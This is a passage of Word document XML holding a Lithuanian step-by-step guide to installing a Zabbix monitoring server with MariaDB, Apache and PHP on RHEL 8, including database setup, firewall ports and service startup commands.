        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">rpm -Uvh </w:t>
      </w:r>
      <w:hyperlink r:id="rId210">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://repo.zabbix.com/zabbix/5.0/rhel/8/x86_64/zabbix-release-5.0-1.el8.noarch.rpmdnf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> clean alldnf -y install zabbix-server-mysql zabbix-web-mysql zabbix-apache-conf zabbix-agentrpm -Uvh </w:t>
      </w:r>
      <w:hyperlink r:id="rId211">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://repo.zabbix.com/zabbix/5.2/rhel/8/x86_64/zabbix-release-5.2-1.el8.noarch.rpmdnf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> clean alldnf -y install zabbix-server-mysql zabbix-web-mysql zabbix-apache-conf zabbix-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E142D" w14:textId="40E8F5BE" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įdiekite ir konfigūruokite duomenų bazę</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585A7539" w14:textId="78B0CEDE" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iegiame MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11C225" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dnf -y install mariadb-server &amp;&amp; systemctl start mariadb &amp;&amp; systemctl enable mariadb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F221E69" w14:textId="53416E4B" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tliekame slaptažodžio atsatatymą (reset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FED7BB" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql_secure_installationEnter current password for root (enter for none): </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Press the Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set root password? [Y/n]: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="001E6C5F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">New password: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>&lt;Enter root DB password&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-enter new password: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>&lt;Repeat root DB password&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Remove anonymous users? [Y/n]: YDisallow root login remotely? [Y/n]: YRemove test database and access to it? [Y/n]: YReload privilege tables now? [Y/n]: Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32852693" w14:textId="4556F096" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ukuriame duomenų bazę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64FEC9" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mysql -uroot -p'</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>rootDBpass</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>' -e "create database zabbix character set utf8 collate utf8_bin;"mysql -uroot -p'</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>rootDBpass</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>' -e "grant all privileges on zabbix.* to zabbix@localhost identified by '</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>zabbixDBpass</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1240F8" w14:textId="6580668F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mportuo</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jame</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pradinę schemą ir duomenis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D8BE8" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>mysql -uroot -p'</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>rootDBpass</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>' zabbix -e "set global innodb_strict_mode='OFF';"zcat /usr/share/doc/zabbix-server-mysql*/create.sql.gz | mysql -uzabbix -p'</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>zabbixDBpass</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>' Zabbixmysql -uroot -p'</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>rootDBpass</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>' zabbix -e "set global innodb_strict_mode='ON';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EC8BC" w14:textId="261B82FA" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dame</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų bazės slaptažodį į „Zabbix“ konfigūracijos failą</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE3EA09" w14:textId="221BD16E" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>DBPassword=</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>zabbixDBpass</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205B8D1" w14:textId="38FCF230" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Paleiskite „Zabbix“ serverio ir agento procesus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C8105" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>systemctl restart zabbix-server zabbix-agentsystemctl enable zabbix-server zabbix-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612BAAAA" w14:textId="7BBF1ADB" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Konfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ugn</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sienę</w:t>
      </w:r>
      <w:r w:rsidR="3E56FDE8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E43CD30" w14:textId="18444CCC" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">firewall-cmd --add-service={http,https} --permanentfirewall-cmd --add-port={10051/tcp,10050/tcp} --permanentfirewall-cmd </w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>reload</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C63E24" w14:textId="40087E80" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Konfigūruokite „Zabbix“ sąsają</w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E74CE" w14:textId="4175F59E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>onfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jame</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Zabbix“ sąsajos (fronted) PHP</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A666537" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>nano /etc/php-fpm.d/zabbix.confphp_value date.timezone Europe/Amsterdam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F215885" w14:textId="2AE33253" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>erkrau</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Apache“ žiniatinklio serverį ir paleiskite jį paleisdami sistemą</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F028B4F" w14:textId="1C18F2E8" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>systemctl restart httpd php-fpmsystemctl enable httpd php-fpm</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AEA72D" w14:textId="30DD5904" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Konfigūru</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ojame</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> žiniatinklio sąsają</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0EAEBC" w14:textId="2E1A92BC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00C4341E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Šiuo</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
